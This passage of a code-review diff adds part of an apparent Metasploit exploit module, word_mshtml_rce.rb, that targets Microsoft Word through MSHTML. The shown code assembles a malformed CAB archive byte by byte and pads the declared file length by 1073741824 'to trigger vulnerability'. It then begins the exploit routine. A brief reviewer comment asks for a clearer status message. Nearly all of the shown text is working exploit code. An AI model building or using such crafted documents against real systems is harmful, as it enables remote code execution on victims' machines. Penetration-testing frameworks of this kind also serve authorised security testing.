modules/exploits/windows/fileformat/word_mshtml_rce.rb

```diff
@@ -0,0 +1,375 @@
+    end
+
+    cab_size = [
+      struct_cfheader +
+        struct_cffile +
+        filename.length +
+        cab_cfdata.length
+    ].pack('L<')
+
+    # CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB)
+    cab_header = "\x4D\x53\x43\x46" # uint32 {4} - Header (MSCF)
+    cab_header << "\x00\x00\x00\x00" # uint32 {4} - Reserved (null)
+    cab_header << cab_size # uint32 {4} - Archive Length
+    cab_header << "\x00\x00\x00\x00"         # uint32 {4} - Reserved (null)
+
+    cab_header << "\x2C\x00\x00\x00"         # uint32 {4} - Offset to the first CFFILE
+    cab_header << "\x00\x00\x00\x00"         # uint32 {4} - Reserved (null)
+    cab_header << "\x03"                     # byte   {1} - Minor Version (3)
+    cab_header << "\x01"                     # byte   {1} - Major Version (1)
+    cab_header << "\x01\x00"                 # uint16 {2} - Number of Folders
+    cab_header << "\x01\x00"                 # uint16 {2} - Number of Files
+    cab_header << "\x00\x00"                 # uint16 {2} - Flags
+
+    cab_header << "\xD2\x04"                 # uint16 {2} - Cabinet Set ID Number
+    cab_header << "\x00\x00"                 # uint16 {2} - Sequential Number of this Cabinet file in a Set
+
+    # CFFOLDER
+    cab_header << [                          # uint32 {4} - Offset to the first CFDATA in this Folder
+      struct_cfheader +
+      struct_cffile +
+      filename.length
+    ].pack('L<')
+    cab_header << [block_counter].pack('S<') # uint16 {2} - Number of CFDATA blocks in this Folder
+    cab_header << "\x00\x00"                 # uint16 {2} - Compression Format for each CFDATA in this Folder (1 = MSZIP)
+
+    # increase file size to trigger vulnerability
+    cab_header << [ # uint32 {4} - Uncompressed File Length ("\x02\x00\x5C\x41")
+      data.length + 1073741824
+    ].pack('L<')
+
+    # set current date and time in the format of cab file
+    date_time = Time.new
+    date = [((date_time.year - 1980) << 9) + (date_time.month << 5) + date_time.day].pack('S')
+    time = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack('S')
+
+    # CFFILE
+    cab_header << "\x00\x00\x00\x00"         # uint32 {4} - Offset in the Uncompressed CFDATA for the Folder this file belongs to (relative to the start of the Uncompressed CFDATA for this Folder)
+    cab_header << "\x00\x00"                 # uint16 {2} - Folder ID (starts at 0)
+    cab_header << date                       # uint16 {2} - File Date (\x5A\x53)
+    cab_header << time                       # uint16 {2} - File Time (\xC3\x5C)
+    cab_header << "\x20\x00"                 # uint16 {2} - File Attributes
+    cab_header << filename                   # byte   {X} - Filename (ASCII)
+    cab_header << "\x00"                     # byte   {1} - null Filename Terminator
+
+    cab_stream = cab_header
+
+    # CFDATA
+    cab_stream << cab_cfdata
+  end
+
+  def exploit
+    print_status("target.name = #{target.name}")
```

Comment:
If we're going to print the target here, can we make it a little more descriptive so it doesn't look like debug output?